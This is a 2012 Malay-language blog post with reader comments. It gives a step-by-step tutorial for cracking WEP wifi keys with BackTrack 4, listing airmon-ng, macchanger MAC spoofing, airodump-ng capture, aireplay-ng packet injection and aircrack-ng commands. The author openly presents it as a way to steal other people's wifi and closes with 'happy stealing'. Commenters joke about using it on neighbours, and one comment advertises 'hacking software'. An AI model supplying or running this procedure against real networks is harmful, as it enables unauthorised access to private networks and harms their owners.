Sunday, 15 January 2012

Hack Wireless Password

Kenapa SUKA sangat cari artikel berkaitan HACK WIFI ni??
hahaha..mesti kau juga macam aku kan!!!
BTW
Kali ni, aku kasi sikit la ilmu jahat yang aku ada..
Ini berkenaan dengan hacking wifi ..
Rasanya tak banyak tutorial yang dapat membantu ..
Tapi tutorial ni, dijamin dapat membantu kerja jahat korang ni.

Tapi, tutorial ini hanya pernah dicuba untuk WEP key ..
Untuk wpa aku tak pernah cuba ..

Untuk hack wep password,
Korang perlukan benda ni ..

1 . BACKTRACK 4 . ( cari, download, dan burn dalam cd , then install)



##########################################################
NOTES (SELALU RUJUK BAHAGIAN INI KALAU TAK FAHAM)

##########################################################

wlan0 = Interface (Examples: wlan0 atau ath0 atau eth0)

ch = The channel the target is on (Examples: 6 atau 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore “:”


##########################################################
LANGKAH UNTUK HACK 

##########################################################


1. Boot laptop kau dengan gunakan Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Buka Konsole dan taip perkataan berikut:
3. airmon-ng (Kau akan nampak tau Interface apa yang digunakan)
4. airmon-ng stop wlan0 ***Kebiasaanya interface ialah wlan0. Tapi, setting ikut interface korang ***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Tekan CTRL+C selepas korang cari WEP yang nak dihack, kemudian copy dia punya  BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Buka Konsole baru dan taip seperti di bawah ni:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Kemudian buka lagi  Konsole yang baru dan taip seperti di bawah ni :
15. aircrack-ng -b (bssid) (file name)-01.cap


Tunggulah .. mungkin ia mengambil masa sedikit untuk dapatkan password.



Selamat mencuri !

23 comments:

..cik hana.. said...

uix,ajar adik2 mencuri erk...x baik tu dosa besaw..haha :P

mR.aSLaN said...

@cik hana : huhuhuh .. :-) kongsi bersama² :-) tambah ilmu .. haha.. wpun ada tutorial pon, blom tentu org tu berjaya..

nifi2408 said...

Err -,-

Aishah Jahirah said...

ehem2...jangan ikut ajaran curi password wireless ni...xberetika...hehee

apix said...

owh yes !!!!!!! hehehehe dapat ilmu baru .. barulah boleh hack wifi orang depan .. belagak sangat .! hahaha(ketwa jahat)

Nur Hazlin said...

aku tkyah susah2 hack pass jiran aku, teka je dah dpt. senang gilo. aku selalu tumpang wireless dia. kahkah

mR.aSLaN said...

@nifi : jgn argue..kene nnt .

@aishah : heheh . sy cracker je:-) ni saje utk test ilmu.huhuuhuh.

@apix : guna skit2 dahler..jgn abiskan bandwitch org..tak baik,

@nur hazlin : wah main teka jer? da tu aku ni takkan nak teka..passwd 13huruf kot...

zizie said...

hahaha... terbaik~~

syamy said...

wahh ! jahatnye dea ,
main curik2 pulakk ,
err ,~

NurSyafinaz said...

hack fb ta de ke ? haha

mR.aSLaN said...

@zizie : nk test bleh test.. tak paham mai tanya sini . huhuhu ..

@syamy : hahaha jahat skit2 jer:-)

@Nursyafinaz : ada .. tapi tak pernah try .. kene rajin cari la..google is you friend :-)

|cah-sahaJa said...

wah kejamm.. haha. neway terbaik.. i un pnh wat.. :p

zareliqa afiqa said...

owh,rasa macam dah nak terpengaruh pulak neh.ngeee :D

mR.aSLaN said...

zareliqa : huhuh best gile kot bila berjaya :-) but now i;m using free wifi yg gov sediakan jer... not bad laju plak.. hehehhe

nifi2408 said...

Tak cakap pun nak argue -,-

mR.aSLaN said...

tapi gaya nak argue tu dah ada ...

nifi2408 said...

Baru type "Err." Tak cakap apa pun lagi. Mana ada gaya argue. Haha.

mR.aSLaN said...

sbb sy leh baca orang tu camne:-)

shaijal said...

wifi password Hacking software Free download
anytinkz.blogspot.com
Enjoy!

anun said...

ade x cara senang nak hack wifi tanpa guna software.

sesiapa y tahu, boleh email di anun_dabluv@yahoo.com

P/s amat memerlukan. wifi kt rumah xleh connect ngn phone

mR.aSLaN said...

tak boleh hack tanpa guna software ..
cara kat atas ni pon kira paling senang dah

Anonymous said...

if we know to pick-lock dosen't mean we thief, same as we hack wifi haha

mR.aSLaN said...

Anonymous : hahahha pandailah.. alasan yg akan dipersetujui oleh penggemar2 hack wifi..hahaha